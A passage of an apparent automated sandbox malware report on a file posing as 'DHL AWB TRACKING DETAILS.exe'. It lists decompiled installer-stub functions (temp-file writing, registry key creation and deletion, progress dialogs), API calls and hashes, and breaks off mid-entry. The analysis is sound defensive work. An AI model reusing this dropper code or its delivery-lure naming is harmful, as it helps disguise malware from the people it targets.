                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Char$Next$Prev
                    • String ID: "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                    • API String ID: 589700163-3134418922
                    • Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                    • Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
                    • Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                    • Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                    				struct tagLOGBRUSH _v16;
                    				long _t35;
                    				long _t37;
                    				void* _t40;
                    				long* _t49;
                    
                    				if(_a4 + 0xfffffecd > 5) {
                    					L15:
                    					return 0;
                    				}
                    				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                    				if(_t49 == 0) {
                    					goto L15;
                    				}
                    				_t35 =  *_t49;
                    				if((_t49[5] & 0x00000002) != 0) {
                    					_t35 = GetSysColor(_t35);
                    				}
                    				if((_t49[5] & 0x00000001) != 0) {
                    					SetTextColor(_a8, _t35);
                    				}
                    				SetBkMode(_a8, _t49[4]);
                    				_t37 = _t49[1];
                    				_v16.lbColor = _t37;
                    				if((_t49[5] & 0x00000008) != 0) {
                    					_t37 = GetSysColor(_t37);
                    					_v16.lbColor = _t37;
                    				}
                    				if((_t49[5] & 0x00000004) != 0) {
                    					SetBkColor(_a8, _t37);
                    				}
                    				if((_t49[5] & 0x00000010) != 0) {
                    					_v16.lbStyle = _t49[2];
                    					_t40 = _t49[3];
                    					if(_t40 != 0) {
                    						DeleteObject(_t40);
                    					}
                    					_t49[3] = CreateBrushIndirect( &_v16);
                    				}
                    				return _t49[3];
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                    • String ID:
                    • API String ID: 2320649405-0
                    • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                    • Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
                    • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                    • Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E0040266E(struct _OVERLAPPED* __ebx) {
                    				void* _t27;
                    				long _t32;
                    				struct _OVERLAPPED* _t47;
                    				void* _t51;
                    				void* _t53;
                    				void* _t56;
                    				void* _t57;
                    				void* _t58;
                    
                    				_t47 = __ebx;
                    				 *(_t58 - 8) = 0xfffffd66;
                    				_t52 = E004029E8(0xfffffff0);
                    				 *(_t58 - 0x44) = _t24;
                    				if(E004055E5(_t52) == 0) {
                    					E004029E8(0xffffffed);
                    				}
                    				E0040573D(_t52);
                    				_t27 = E0040575C(_t52, 0x40000000, 2);
                    				 *(_t58 + 8) = _t27;
                    				if(_t27 != 0xffffffff) {
                    					_t32 =  *0x423eb4; // 0x7e00
                    					 *(_t58 - 0x2c) = _t32;
                    					_t51 = GlobalAlloc(0x40, _t32);
                    					if(_t51 != _t47) {
                    						E004031DA(_t47);
                    						E004031A8(_t51,  *(_t58 - 0x2c));
                    						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
                    						 *(_t58 - 0x30) = _t56;
                    						if(_t56 != _t47) {
                    							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
                    							while( *_t56 != _t47) {
                    								_t49 =  *_t56;
                    								_t57 = _t56 + 8;
                    								 *(_t58 - 0x38) =  *_t56;
                    								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                    								_t56 = _t57 +  *(_t58 - 0x38);
                    							}
                    							GlobalFree( *(_t58 - 0x30));
                    						}
                    						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
                    						GlobalFree(_t51);
                    						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
                    					}
                    					CloseHandle( *(_t58 + 8));
                    				}
                    				_t53 = 0xfffffff3;
                    				if( *(_t58 - 8) < _t47) {
                    					_t53 = 0xffffffef;
                    					DeleteFileA( *(_t58 - 0x44));
                    					 *((intOrPtr*)(_t58 - 4)) = 1;
                    				}
                    				_push(_t53);
                    				E00401423();
                    				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
                    				return 0;
                    			}

                    APIs
                    • GlobalAlloc.KERNEL32(00000040,00007E00,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                    • GlobalFree.KERNEL32 ref: 00402717
                    • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                    • GlobalFree.KERNEL32 ref: 00402730
                    • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                    • String ID:
                    • API String ID: 3294113728-0
                    • Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                    • Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
                    • Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                    • Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00404E23(CHAR* _a4, CHAR* _a8) {
                    				struct HWND__* _v8;
                    				signed int _v12;
                    				CHAR* _v32;
                    				long _v44;
                    				int _v48;
                    				void* _v52;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				CHAR* _t26;
                    				signed int _t27;
                    				CHAR* _t28;
                    				long _t29;
                    				signed int _t39;
                    
                    				_t26 =  *0x423684; // 0x0
                    				_v8 = _t26;
                    				if(_t26 != 0) {
                    					_t27 =  *0x423f54; // 0x0
                    					_v12 = _t27;
                    					_t39 = _t27 & 0x00000001;
                    					if(_t39 == 0) {
                    						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
                    					}
                    					_t26 = lstrlenA(0x41fc70);
                    					_a4 = _t26;
                    					if(_a8 == 0) {
                    						L6:
                    						if((_v12 & 0x00000004) == 0) {
                    							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
                    						}
                    						if((_v12 & 0x00000002) == 0) {
                    							_v32 = 0x41fc70;
                    							_v52 = 1;
                    							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                    							_v44 = 0;
                    							_v48 = _t29 - _t39;
                    							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                    							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                    						}
                    						if(_t39 != 0) {
                    							_t28 = _a4;
                    							 *((char*)(_t28 + 0x41fc70)) = 0;
                    							return _t28;
                    						}
                    					} else {
                    						_t26 =  &(_a4[lstrlenA(_a8)]);
                    						if(_t26 < 0x800) {
                    							_t26 = lstrcatA(0x41fc70, _a8);
                    							goto L6;
                    						}
                    					}
                    				}
                    				return _t26;
                    			}

                    APIs
                    • lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                    • lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                    • lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                    • SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                    • String ID:
                    • API String ID: 2531174081-0
                    • Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                    • Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
                    • Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                    • Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
                    				long _v8;
                    				signed char _v12;
                    				unsigned int _v16;
                    				void* _v20;
                    				intOrPtr _v24;
                    				long _v56;
                    				void* _v60;
                    				long _t15;
                    				unsigned int _t19;
                    				signed int _t25;
                    				struct HWND__* _t28;
                    
                    				_t28 = _a4;
                    				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                    				if(_a8 == 0) {
                    					L4:
                    					_v56 = _t15;
                    					_v60 = 4;
                    					SendMessageA(_t28, 0x110c, 0,  &_v60);
                    					return _v24;
                    				}
                    				_t19 = GetMessagePos();
                    				_v16 = _t19 >> 0x10;
                    				_v20 = _t19;
                    				ScreenToClient(_t28,  &_v20);
                    				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                    				if((_v12 & 0x00000066) != 0) {
                    					_t15 = _v8;
                    					goto L4;
                    				}
                    				return _t25 | 0xffffffff;
                    			}















                    APIs
                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040470D
                    • GetMessagePos.USER32 ref: 00404715
                    • ScreenToClient.USER32 ref: 0040472F
                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404741
                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404767
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Message$Send$ClientScreen
                    • String ID: f
                    • API String ID: 41195575-1993550816
                    • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                    • Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
                    • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                    • Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
                    				char _v68;
                    				void* _t11;
                    				CHAR* _t19;
                    
                    				if(_a8 == 0x110) {
                    					SetTimer(_a4, 1, 0xfa, 0);
                    					_a8 = 0x113;
                    				}
                    				if(_a8 == 0x113) {
                    					_t11 = E00402BA9();
                    					_t19 = "unpacking data: %d%%";
                    					if( *0x423eb0 == 0) {
                    						_t19 = "verifying installer: %d%%";
                    					}
                    					wsprintfA( &_v68, _t19, _t11);
                    					SetWindowTextA(_a4,  &_v68);
                    					SetDlgItemTextA(_a4, 0x406,  &_v68);
                    				}
                    				return 0;
                    			}







                    APIs
                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
                    • wsprintfA.USER32 ref: 00402B7C
                    • SetWindowTextA.USER32(?,?), ref: 00402B8C
                    • SetDlgItemTextA.USER32 ref: 00402B9E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Text$ItemTimerWindowwsprintf
                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                    • API String ID: 1451636040-1158693248
                    • Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                    • Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
                    • Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                    • Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E004022F5(void* __eax) {
                    				void* _t15;
                    				char* _t18;
                    				int _t19;
                    				char _t24;
                    				int _t27;
                    				signed int _t30;
                    				intOrPtr _t35;
                    				void* _t37;
                    
                    				_t15 = E00402ADD(__eax);
                    				_t35 =  *((intOrPtr*)(_t37 - 0x14));
                    				 *(_t37 - 0x30) =  *(_t37 - 0x10);
                    				 *(_t37 - 0x44) = E004029E8(2);
                    				_t18 = E004029E8(0x11);
                    				_t30 =  *0x423f50; // 0x0
                    				_t31 = _t30 | 0x00000002;
                    				 *(_t37 - 4) = 1;
                    				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
                    				if(_t19 == 0) {
                    					if(_t35 == 1) {
                    						E004029E8(0x23);
                    						_t19 = lstrlenA(0x40a368) + 1;
                    					}
                    					if(_t35 == 4) {
                    						_t24 = E004029CB(3);
                    						 *0x40a368 = _t24;
                    						_t19 = _t35;
                    					}
                    					if(_t35 == 3) {
                    						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
                    					}
                    					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
                    						 *(_t37 - 4) = _t27;
                    					}
                    					_push( *(_t37 + 8));
                    					RegCloseKey();
                    				}
                    				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
                    				return 0;
                    			}












                    APIs
                    • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402333
                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
                    • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040238C
                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: CloseCreateValuelstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp
                    • API String ID: 1356686001-535908173
                    • Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                    • Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
                    • Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                    • Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00402BC5(intOrPtr _a4) {
                    				char _v68;
                    				long _t6;
                    				struct HWND__* _t7;
                    				struct HWND__* _t14;
                    
                    				if(_a4 != 0) {
                    					_t14 =  *0x417044; // 0x0
                    					if(_t14 != 0) {
                    						_t14 = DestroyWindow(_t14);
                    					}
                    					 *0x417044 = 0;
                    					return _t14;
                    				}
                    				__eflags =  *0x417044; // 0x0
                    				if(__eflags != 0) {
                    					return E00405DDC(0);
                    				}
                    				_t6 = GetTickCount();
                    				__eflags = _t6 -  *0x423eac;
                    				if(_t6 >  *0x423eac) {
                    					__eflags =  *0x423ea8; // 0x0
                    					if(__eflags == 0) {
                    						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
                    						 *0x417044 = _t7;
                    						return _t7;
                    					}
                    					__eflags =  *0x423f54 & 0x00000001;
                    					if(( *0x423f54 & 0x00000001) != 0) {
                    						wsprintfA( &_v68, "... %d%%", E00402BA9());
                    						return E00404E23(0,  &_v68);
                    					}
                    				}
                    				return _t6;
                    			}








                    APIs
                    • DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
                    • GetTickCount.KERNEL32 ref: 00402BFB
                    • CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D
                      • Part of subcall function 00402BA9: MulDiv.KERNEL32(00000000,00000064,00004081), ref: 00402BBE
                    • wsprintfA.USER32 ref: 00402C29
                      • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                      • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                      • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                      • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                      • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                      • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                      • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
                    • String ID: ... %d%%
                    • API String ID: 632923820-2449383134
                    • Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                    • Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
                    • Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                    • Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 84%
                    			E00402A28(void* _a4, char* _a8, long _a12) {
                    				void* _v8;
                    				char _v272;
                    				signed char _t16;
                    				long _t18;
                    				long _t25;
                    				intOrPtr* _t27;
                    				long _t28;
                    
                    				_t16 =  *0x423f50; // 0x0
                    				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
                    				if(_t18 == 0) {
                    					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                    						__eflags = _a12;
                    						if(_a12 != 0) {
                    							RegCloseKey(_v8);
                    							L8:
                    							__eflags = 1;
                    							return 1;
                    						}
                    						_t25 = E00402A28(_v8,  &_v272, 0);
                    						__eflags = _t25;
                    						if(_t25 != 0) {
                    							break;
                    						}
                    					}
                    					RegCloseKey(_v8);
                    					_t27 = E00405DA3(2);
                    					if(_t27 == 0) {
                    						__eflags =  *0x423f50; // 0x0
                    						if(__eflags != 0) {
                    							goto L8;
                    						}
                    						_t28 = RegDeleteKeyA(_a4, _a8);
                    						__eflags = _t28;
                    						if(_t28 != 0) {
                    							goto L8;
                    						}
                    						return _t28;
                    					}
                    					return  *_t27(_a4, _a8,  *0x423f50, 0);
                    				}
                    				return _t18;
                    			}











                    APIs
                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                    • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                    • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Close$DeleteEnumOpen
                    • String ID:
                    • API String ID: 1912718029-0
                    • Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                    • Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
                    • Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                    • Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00401CC1(int __edx) {
                    				void* _t17;
                    				struct HINSTANCE__* _t21;
                    				struct HWND__* _t25;
                    				void* _t27;
                    
                    				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
                    				GetClientRect(_t25, _t27 - 0x40);
                    				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                    				if(_t17 != _t21) {
                    					DeleteObject(_t17);
                    				}
                    				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
                    				return 0;
                    			}








                    APIs
                    • GetDlgItem.USER32 ref: 00401CC5
                    • GetClientRect.USER32 ref: 00401CD2
                    • LoadImageA.USER32 ref: 00401CF3
                    • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                    • DeleteObject.GDI32(00000000), ref: 00401D10
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
